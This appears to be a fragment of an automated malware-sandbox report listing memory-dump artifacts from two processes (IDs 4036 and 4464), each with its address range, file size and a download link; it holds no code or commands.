memory/4036-10-0x0000000005280000-0x00000000052B6000-memory.dmp

Filesize
216KB

Download
memory/4036-29-0x0000000006DB0000-0x0000000006DCA000-memory.dmp

Filesize
104KB

Download
memory/4036-13-0x0000000074670000-0x0000000074E20000-memory.dmp

Filesize
7.7MB

Download
memory/4464-6-0x0000000006410000-0x0000000006486000-memory.dmp

Filesize
472KB

Download
memory/4464-5-0x00000000052B0000-0x0000000005316000-memory.dmp

Filesize
408KB

Download
memory/4464-4-0x0000000005860000-0x0000000005E04000-memory.dmp

Filesize
5.6MB

Download
memory/4464-1093-0x0000000074670000-0x0000000074E20000-memory.dmp

Filesize
7.7MB

Download
memory/4464-3-0x0000000005210000-0x00000000052AC000-memory.dmp

Filesize
624KB

Download
memory/4464-2-0x0000000074670000-0x0000000074E20000-memory.dmp

Filesize
7.7MB

Download
memory/4464-1092-0x000000007467E000-0x000000007467F000-memory.dmp

Filesize
4KB

Download
memory/4464-0-0x000000007467E000-0x000000007467F000-memory.dmp

Filesize
4KB

Download
memory/4464-8-0x00000000064F0000-0x000000000650E000-memory.dmp

Filesize
120KB

Download
memory/4464-7-0x0000000006390000-0x00000000063F2000-memory.dmp

Filesize
392KB

Download
memory/4464-1-0x0000000000450000-0x0000000000462000-memory.dmp

Filesize
72KB

Download